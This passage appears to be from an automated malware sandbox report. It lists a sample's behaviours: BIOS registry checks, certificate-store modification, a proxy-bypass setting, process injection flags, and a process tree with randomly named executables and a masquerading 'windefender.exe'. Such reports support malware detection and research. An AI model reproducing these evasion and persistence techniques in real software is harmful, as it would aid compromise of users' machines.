| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\un4.1.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe
"C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe
"C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe"
C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe
"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"
C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe
"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"
C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe
"C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe"
C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe
"C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4912 -ip 4912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 884
C:\Users\Admin\AppData\Local\Temp\un4.0.exe
"C:\Users\Admin\AppData\Local\Temp\un4.0.exe"
C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe
"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"
C:\Users\Admin\AppData\Local\Temp\un4.1.exe
"C:\Users\Admin\AppData\Local\Temp\un4.1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 832 -ip 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 1512
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe
"C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5084 -ip 5084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 616
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5084 -ip 5084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 648
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
